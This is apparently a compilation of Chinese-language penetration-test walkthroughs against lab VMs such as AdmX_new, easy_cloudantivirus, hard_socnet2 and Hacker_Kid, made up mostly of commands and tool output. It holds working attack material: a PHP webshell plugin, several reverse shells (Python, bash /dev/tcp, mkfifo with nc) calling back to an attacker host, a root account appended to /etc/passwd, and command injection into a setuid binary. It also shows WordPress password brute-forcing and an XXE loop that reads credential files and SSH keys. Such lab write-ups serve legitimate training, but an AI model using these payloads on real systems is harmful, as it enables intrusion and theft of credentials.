1	echo 'jere:$1$jere$pGQGlxgnH.no4.Pphez9o1:0:0::/root:/bin/bash' >> /etc/passwd

su jere

root@EvilBoxOne:/home/mowree# id
uid=0(root) gid=0(root) grupos=0(root)
root@EvilBoxOne:/home/mowree# ls
user.txt
root@EvilBoxOne:/home/mowree# cd /
root@EvilBoxOne:/# ls
bin   etc         initrd.img.old  lib64       media  proc  sbin  tmp  vmlinuz
boot  home        lib             libx32      mnt    root  srv   usr  vmlinuz.old
dev   initrd.img  lib32           lost+found  opt    run   sys   var
root@EvilBoxOne:/# cd root
root@EvilBoxOne:~# ls
root.txt
root@EvilBoxOne:~# cat root.txt
36QtXfdJWvdC0VavlPIApUbDlqTsBM

靶机: AdmX_new

https://www.cnblogs.com/shadow-/p/16852264.html

1
2
3

arp-scan -l -I eth0
nmap -sV 192.168.56.200
dirsearch -u "http://192.168.56.200" -x 403

[10:10:08] Starting: 
[10:10:34] 200 -   11KB - /index.html                                       
[10:10:52] 301 -  316B  - /tools  ->  http://192.168.56.200/tools/          
[10:10:57] 200 -    7KB - /wordpress/wp-login.php                           
[10:10:57] 200 -    8KB - /wordpress/

Task Completed

1	wpscan --url http://192.168.56.200/wordpress --enumerate

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://192.168.56.200/wordpress --enumerate
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.56.200/wordpress/ [192.168.56.200]
[+] Started: Fri Jul 14 01:34:56 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Proxy-Connection: keep-alive
 |  - Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.200/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1'

[i] The main theme could not be detected.

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:02 <=============> (504 / 504) 100.00% Time: 00:00:02

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:13 <===========> (2568 / 2568) 100.00% Time: 00:00:13

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:00 <====================> (71 / 71) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:00 <=========> (100 / 100) 100.00% Time: 00:00:00

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://192.168.56.200/wordpress/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Jul 14 01:35:27 2023
[+] Requests Done: 3442
[+] Cached Requests: 4
[+] Data Sent: 1.172 MB
[+] Data Received: 21.453 MB
[+] Memory used: 280.055 MB
[+] Elapsed time: 00:00:31

1 2	wpscan --url http://192.168.56.200/wordpress -U admin -P /usr/share/wordlists/rockyou.txt

┌──(kali㉿kali)-[/usr/share/seclists]
└─$ wpscan --url http://192.168.56.200/wordpress -U admin -P /usr/share/wordlists/rockyou.txt 

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.56.200/wordpress/ [192.168.56.200]
[+] Started: Fri Jul 14 01:40:56 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Proxy-Connection: keep-alive
 |  - Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.200/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / adam14                                                                   
Trying admin / adalberto Time: 00:03:44 <          > (29510 / 14373902)  0.20%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: adam14

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Jul 14 01:44:44 2023
[+] Requests Done: 29651
[+] Cached Requests: 29
[+] Data Sent: 17.158 MB
[+] Data Received: 17.937 MB
[+] Memory used: 272.906 MB
[+] Elapsed time: 00:03:48

1 2	http://192.168.56.200/wordpress/wp-login.php admin adam14

<?php
/**
 * Plugin Name:Webshell
 * Description:WP Webshell for Pentest
 * Version:1.0
 */
if(isset($_GET['cmd']))
    {
            system($_GET['cmd']);
    }
?>

1	http://192.168.56.200/wordpress/wp-content/plugins/shell.php?cmd=id

python反弹shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",7779));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(["/bin/bash"])'

第一个flag

第二个flag

sudo -l

1 2	sudo /usr/bin/mysql -u root -D wordpress -p adam14

1	\! /bin/bash

靶机: easy_cloudantivirus

https://www.cnblogs.com/shadow-/p/16819678.html

https://www.cnblogs.com/jason-huawen/p/16867502.html //反弹shell

1
2
3

arp-scan -l -I eth0
nmap -A -T4 192.168.56.106
http://192.168.56.106:8080/

target.txt

POST /login HTTP/1.1
Host: 192.168.56.106:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: http://192.168.56.106:8080
Connection: close
Referer: http://192.168.56.106:8080/
Upgrade-Insecure-Requests: 1

password=123

1	sqlmap -r target.txt -f --level 4 --risk 3

1	" or 1=1 -- -

反弹shell

1	bash;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc 192.168.56.102 7779 >/tmp/f

1	python3 -c 'import pty;pty.spawn("/bin/bash")'

ls -alh

用户目录下存在特殊权限文件update_cloudav

scanner@cloudav:~$ ls -alh
ls -alh
total 60K
drwxr-xr-x 6 scanner scanner 4.0K Oct 24  2018 .
drwxr-xr-x 4 root    root    4.0K Oct 21  2018 ..
-rw------- 1 scanner scanner    5 Oct 24  2018 .bash_history
-rw-r--r-- 1 scanner scanner  220 Oct 21  2018 .bash_logout
-rw-r--r-- 1 scanner scanner 3.7K Oct 21  2018 .bashrc
drwx------ 2 scanner scanner 4.0K Oct 21  2018 .cache
drwxrwxr-x 4 scanner scanner 4.0K Oct 24  2018 cloudav_app
drwx------ 3 scanner scanner 4.0K Oct 21  2018 .gnupg
drwxrwxr-x 3 scanner scanner 4.0K Oct 21  2018 .local
-rw-r--r-- 1 scanner scanner  807 Oct 21  2018 .profile
-rw-rw-r-- 1 scanner scanner   66 Oct 21  2018 .selected_editor
-rwsr-xr-x 1 root    scanner 8.4K Oct 24  2018 update_cloudav
-rw-rw-r-- 1 scanner scanner  393 Oct 24  2018 update_cloudav.c

#include <stdio.h>
 
int main(int argc, char *argv[])
{
char *freshclam="/usr/bin/freshclam";
 
if (argc < 2){
printf("This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam\n");
return 1;
}
 
char *command = malloc(strlen(freshclam) + strlen(argv[1]) + 2);
sprintf(command, "%s %s", freshclam, argv[1]);
setgid(0);
setuid(0);
system(command);
return 0;
 
}

1	touch b.sh && echo 'bash -i >& /dev/tcp/192.168.56.102/7778 0>&1' > b.sh && ./update_cloudav "a \| ls \| grep 'xxxxx' \| bash b.sh"

1	touch b.sh && echo 'bash -i >& /dev/tcp/192.168.56.102/7778 0>&1' > b.sh && ./update_cloudav "a \| bash b.sh"

靶机: hard_socnet2

https://www.cnblogs.com/shadow-/p/16863184.html

1
2
3

arp-scan -l -I eth0
nmap -A -T4 192.168.56.107

1 2	http://192.168.56.107/ http://192.168.56.107:8000/

制作木马

1	webacoo -g -o exp.php

1	webacoo -t -u http://192.168.56.107/data/images/posts/9.php

webacoo$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
webacoo$ uname -a
Linux socnet2 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

1	bash -c 'bash -i >& /dev/tcp/192.168.56.102/7778 0>&1'

1	touch 1.sh && echo "bash -c 'bash -i >& /dev/tcp/192.168.56.102/7778 0>&1'" > 1.sh && python3 -m http.server 5000

1	wget http://192.168.56.102:5000/1.sh && chmod 777 ./1.sh && ./1.sh

1	python -c "import pty; pty.spawn('/bin/bash')"

#my remote server management API
import SimpleXMLRPCServer
import subprocess
import random

debugging_pass = random.randint(1000,9999)

def runcmd(cmd):
    results = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    output = results.stdout.read() + results.stderr.read()
    return output

def cpu():
    return runcmd("cat /proc/cpuinfo")

def mem():
    return runcmd("free -m")

def disk():
    return runcmd("df -h")

def net():
    return runcmd("ip a")

def secure_cmd(cmd,passcode):
    if passcode==debugging_pass:
         return runcmd(cmd)
    else:
        return "Wrong passcode."

server = SimpleXMLRPCServer.SimpleXMLRPCServer(("0.0.0.0", 8000))
server.register_function(cpu)
server.register_function(mem)
server.register_function(disk)
server.register_function(net)
server.register_function(secure_cmd)

server.serve_forever()

import xmlrpc.client

with xmlrpc.client.ServerProxy("http://192.168.56.107:8000/") as proxy:
    # print(str(proxy.cpu()))

    # for i in range(1000, 10000):
    #     # print(str(proxy.secure_cmd('whoami', i)))
    #     if not "Wrong" in str(proxy.secure_cmd('whoami', i)):
    #         print(i)
    #         break

    res = str(proxy.secure_cmd('whoami', 6753))
    print(res)

    res = str(proxy.secure_cmd('/var/www/html/data/images/posts/1.sh', 6753))
    print(res)

二次提权：

学pwn去吧（）

靶机: Hacker_Kid-v1.0.1

https://www.cnblogs.com/shadow-/p/16906028.html

arp-scan -l -I eth0
nmap -A -T4 192.168.56.108
http://192.168.56.108/
http://192.168.56.108:9999/

1	comm -3 <(curl "http://192.168.56.108/" 2>/dev/null) <(curl "http://192.168.56.108/?page_no=0" 2>/dev/null) 2>/dev/null

不同之处可以在访问浏览器中发现，也可以通过 curl 请求回返的源码通过 comm 进行比较发现不同的地方
- 对比命令中的不同是使用 Process Substitution 将 curl 输出做为 comm 输入类似管道 | 的使用
- 2>/dev/null 作用是将 标准错误 重定向到 /dev/null 文件
  - /dev/null 是一个特殊的文件，写入到它的内容都会被丢弃，可以理解为垃圾桶

1	comm -3 <(curl "http://192.168.56.108/?page_no=1" 2>/dev/null) <(curl "http://192.168.56.108/?page_no=0" 2>/dev/null) 2>/dev/null

发现结果是一样的，于是写个脚本爆破哪个不一样

i=0
while(( $i<=50 ))
do
    j=$((i+1))
    str=`comm -3 \
        <(curl -i "http://192.168.56.108/?page_no=$i" 2>/dev/null) \
        <(curl -i "http://192.168.56.108/?page_no=$j" 2>/dev/null) \
        2>/dev/null`
    if ((${#str} > 0))
    then
        echo $j
        break
    fi
    let "i++"
done

1
2
3

┌──(root㉿kali)-[/home/kali/Desktop]
└─# bash loop.sh    
21

1	comm -3 <(curl "http://192.168.56.108/?page_no=0" 2>/dev/null) <(curl "http://192.168.56.108/?page_no=21" 2>/dev/null) 2>/dev/null

┌──(root㉿kali)-[/home/kali/Desktop]
└─# comm -3 <(curl "http://192.168.56.108/?page_no=0" 2>/dev/null) <(curl "http://192.168.56.108/?page_no=21" 2>/dev/null) 2>/dev/null
Oh Man !! Isn't is right to go a little deep inside?
<font color="red">
</center>


<!--

<div class="container py-5">
  <h1>Thanks</h1>

        Okay so you want me to speak something ?<br>I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!<br>Out of my many homes...one such home..one such home for me : hackers.blackhat.local<br>
        <font color="red">
        </center>


        <!--

        <div class="container py-5">
          <h1>Thanks</h1>

根据提示

1	curl -H 'Host: hackerkid.blackhat.local' "http://192.168.56.108"

echo '
<?xml version="1.0" encoding="UTF-8"?>
<root>
  <name>1</name>
  <tel>1</tel>
  <email>xxx@xxx.com</email>
  <password>1</password>
</root>' \
| curl http://192.168.56.108/process.php \
-H 'Host: hackerkid.blackhat.local' \
-d @-

返回的内容是 Sorry, xxx@xxx.com is not available !!! 其中 xxx@xxx.com 经过多次尝试此处是动态回返的
对此我们可以尝试使用 xml 的相关漏洞

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE drug [<!ENTITY k SYSTEM 'file:///etc/passwd'>]>
<root>
    <name>1</name>
    <tel>1</tel>
    <email>&k;</email>
    <password>1</password>
</root>

如果 <!DOCTYPE drug [<!ENTITY k SYSTEM 'file:///etc/passwd'>]> 看不懂，可以去查关于 DTD 的内容
在 xml 中包含 DTD 需要使用 DOCTYPE 声明，这个应该好理解，其中 drug 是声明的 XML 文档构建模块 名称可以随意
ENTITY 是进行一个外部实体声明，其中 k 只是一个名称，使用 SYSTEM 引入外部资源，所以 k 现在代表 file:///etc/passwd
其中 email 标签内容是 k 以此通过请求返回看到系统内部信息

echo '
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE drug [<!ENTITY k SYSTEM "file:///etc/passwd">]>
<root>
    <name>1</name>
    <tel>1</tel>
    <email>&k;</email>
    <password>1</password>
</root>' \
| curl http://192.168.56.108/process.php \
-H 'Host: hackerkid.blackhat.local' \
-d @-

成功读取/etc/passwd

接着爆破，

linux中敏感文件file.txt

/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/apache/php/php.ini
/etc/anacrontab
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/at.allow
/etc/at.deny
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/fstab
/etc/host.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/etc/httpd/htdocs/index.php
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/ld.so.conf
/etc/motd
/etc/my.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/passwd
/etc/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/cgi/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/phpmyadmin/config.inc.php
/etc/resolv.conf
/etc/shadow
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key.pub
/etc/ssh/ssh_host_rsa_key.pub
/etc/sysconfig/network
/etc/sysconfig/network
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/home/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/NetServer/bin/stable/apache/php.ini
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.html
/opt/www/htdocs/index.php
/opt/xampp/etc/php.ini
/PHP/php.ini
/php/php.ini
/php4/php.ini
/php5/php.ini
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
/var/apache2/config.inc
/var/httpd/conf/httpd.conf
/var/httpd/conf/php.ini
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.html
/var/httpd/htdocs/index.php
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/httpd.conf
/var/local/www/conf/php.ini
/var/log/access.log
/var/log/access_log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache2/access.log
/var/log/apache2/access_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/var/log/error.log
/var/log/error_log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql.log
/var/log/mysqlderror.log
/var/mail/root
/var/mysql.log
/var/spool/cron/crontabs/root
/var/spool/mail/root
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/www/htdocs/index.php
/var/www/index.html
/var/www/index.php
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
/web/conf/php.ini
/www/conf/httpd.conf
/www/htdocs/index.html
/www/htdocs/index.php
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.atftp_history
/root/.bashrc
/root/.bash_history
/root/.mysql_history
/root/.nano_history
/root/.php_history
/root/.profile
/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/anaconda-ks.cfg
/home/*/.ssh/authorized_keys
/home/*/.ssh/identity
/home/*/.ssh/identity.pub
/home/*/.ssh/id_dsa
/home/*/.ssh/id_dsa.pub
/home/*/.ssh/id_rsa
/home/*/.ssh/id_rsa.pub
/home/*/.atftp_history
/home/*/.bashrc
/home/*/.bash_history
/home/*/.mysql_history
/home/*/.nano_history
/home/*/.php_history
/home/*/.profile
/home/*/.ssh/authorized_keys
/home/*/.ssh/identity
/home/*/.ssh/identity.pub
/home/*/.ssh/id_dsa
/home/*/.ssh/id_dsa.pub
/home/*/.ssh/id_rsa
/home/*/.ssh/id_rsa.pub
/home/*/anaconda-ks.cfg

echo '' > ./test;
for i in $(cat ./file0.txt)
do
str=`echo '
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE drug [<!ENTITY k SYSTEM "php://filter/convert.base64-encode/resource='$i'">]>
<root>
    <name>1</name>
    <tel>1</tel>
    <email>&k;</email>
    <password>1</password>
</root>' \
| curl http://192.168.56.108/process.php \
-H 'Host: hackerkid.blackhat.local' \
-d @- 2>/dev/null`;
 
    if ((${#${str: 7:((${#str}-28))}}!=0)); then
        echo '\n#'$i'###:' >> ./test;
        echo ${str: 7:((${#str}-28))} | base64 -d -i | grep -E "(username|root|saket|admin|password|passwd)" >> ./test;
    fi
done
grep -E "(username|root|saket|admin|password|passwd)" ./test;

/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/apache/php/php.ini
/etc/anacrontab
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/at.allow
/etc/at.deny
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/fstab
/etc/host.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/etc/httpd/htdocs/index.php
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/ld.so.conf
/etc/motd
/etc/my.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/passwd
/etc/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/cgi/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/phpmyadmin/config.inc.php
/etc/resolv.conf
/etc/shadow
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key.pub
/etc/ssh/ssh_host_rsa_key.pub
/etc/sysconfig/network
/etc/sysconfig/network
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/home/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/NetServer/bin/stable/apache/php.ini
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.html
/opt/www/htdocs/index.php
/opt/xampp/etc/php.ini
/PHP/php.ini
/php/php.ini
/php4/php.ini
/php5/php.ini
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
/var/apache2/config.inc
/var/httpd/conf/httpd.conf
/var/httpd/conf/php.ini
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.html
/var/httpd/htdocs/index.php
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/httpd.conf
/var/local/www/conf/php.ini
/var/log/access.log
/var/log/access_log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache2/access.log
/var/log/apache2/access_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/var/log/error.log
/var/log/error_log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql.log
/var/log/mysqlderror.log
/var/mail/root
/var/mysql.log
/var/spool/cron/crontabs/root
/var/spool/mail/root
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/www/htdocs/index.php
/var/www/index.html
/var/www/index.php
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
/web/conf/php.ini
/www/conf/httpd.conf
/www/htdocs/index.html
/www/htdocs/index.php
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.atftp_history
/root/.bashrc
/root/.bash_history
/root/.mysql_history
/root/.nano_history
/root/.php_history
/root/.profile
/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/anaconda-ks.cfg
/home/saket/.ssh/authorized_keys
/home/saket/.ssh/identity
/home/saket/.ssh/identity.pub
/home/saket/.ssh/id_dsa
/home/saket/.ssh/id_dsa.pub
/home/saket/.ssh/id_rsa
/home/saket/.ssh/id_rsa.pub
/home/saket/.atftp_history
/home/saket/.bashrc
/home/saket/.bash_history
/home/saket/.mysql_history
/home/saket/.nano_history
/home/saket/.php_history
/home/saket/.profile
/home/saket/.ssh/authorized_keys
/home/saket/.ssh/identity
/home/saket/.ssh/identity.pub
/home/saket/.ssh/id_dsa
/home/saket/.ssh/id_dsa.pub
/home/saket/.ssh/id_rsa
/home/saket/.ssh/id_rsa.pub
/home/saket/anaconda-ks.cfg

HOME=/root
LOGNAME=root
# and files in /etc/cron.d. These files also have username fields,
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# It has been reported that passwords should be enclosed with ticks/quotes
# It has been reported that passwords should be enclosed with ticks/quotes
#/etc/passwd###:
root:x:0:0:root:/root:/bin/bash
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
